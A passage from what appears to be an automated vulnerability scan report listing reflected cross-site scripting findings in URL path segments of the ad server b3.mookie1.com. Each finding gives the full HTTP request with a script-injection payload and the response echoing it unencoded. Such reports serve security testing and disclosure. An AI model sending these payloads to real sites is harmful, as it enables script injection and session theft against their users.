<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/356869465/x90db4ff"><script>alert(1)</script>9cb16008c26/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.101. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 2 (the second path segment, 247B3) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 3091d"><script>alert(1)</script>6f772d0085e was submitted in the REST URL parameter 2 and was echoed unmodified, without URL or HTML-attribute encoding. This is the same injection point as 3.95, reached through a different ad identifier in the final path segment; findings 3.101 to 3.106 repeat 3.95 to 3.100 for that identifier.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B33091d"><script>alert(1)</script>6f772d0085e/Dominos/11Q2/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B33091d"><script>alert(1)</script>6f772d0085e/Dominos/11Q2/CPC/728/1033713770/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.102. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 3 (the third path segment, Dominos) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload d062c"><script>alert(1)</script>ca4abf2e429 was submitted in the REST URL parameter 3 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominosd062c"><script>alert(1)</script>ca4abf2e429/11Q2/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominosd062c"><script>alert(1)</script>ca4abf2e429/11Q2/CPC/728/832598647/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.103. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 4 (the fourth path segment, 11Q2) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 90454"><script>alert(1)</script>2d82bb5a239 was submitted in the REST URL parameter 4 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q290454"><script>alert(1)</script>2d82bb5a239/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q290454"><script>alert(1)</script>2d82bb5a239/CPC/728/853761001/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.104. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 5 (the fifth path segment, CPC) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 284b4"><script>alert(1)</script>d510252fe66 was submitted in the REST URL parameter 5 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/1348337210/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.105. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 6 (the sixth path segment, 728) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload ed4d2"><script>alert(1)</script>1a64d0928f4 was submitted in the REST URL parameter 6 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/901638741/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.106. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 7 (the final path segment, 11959749775@x90) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 764de"><script>alert(1)</script>9f3a5ed7d4b was appended to the REST URL parameter 7 and was echoed unmodified, without URL or HTML-attribute encoding. As in 3.100, only the part of the segment after the @ is reflected; the numeric prefix is replaced by a server-generated value (1687274362) in the response.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90764de"><script>alert(1)</script>9f3a5ed7d4b HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/1687274362/x90764de"><script>alert(1)</script>9f3a5ed7d4b/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.107. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 2 (the second path segment, 247B3) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 8c5f0"><script>alert(1)</script>f92225dbdf6 was submitted in the REST URL parameter 2 and was echoed unmodified, without URL or HTML-attribute encoding. This is the same injection point as 3.95 and 3.101, reached through a third ad identifier in the final path segment.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/421997782/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.108. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 3 (the third path segment, Dominos) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload ff03f"><script>alert(1)</script>e08fcce560c was submitted in the REST URL parameter 3 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/81295705/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.109. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56e9"><script>alert(1)</script>e3257083564 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/160846727/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.110. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 232e4"><script>alert(1)</script>518b442c3c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1034691805/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.111. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce9"><script>alert(1)</script>6f09d14ccb6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1306728366/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.112. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a008"><script>alert(1)</script>f83aab5e457 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/1849951236@x901a008"><script>alert(1)</script>f83aab5e457 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 335
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/6479176/x901a008"><script>alert(1)</script>f83aab5e457/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.113. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9584"><script>alert(1)</script>e2a5ada99b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderc9584"><script>alert(1)</script>e2a5ada99b2/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderc9584"><script>alert(1)</script>e2a5ada99b2/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/2013242908/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.114. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
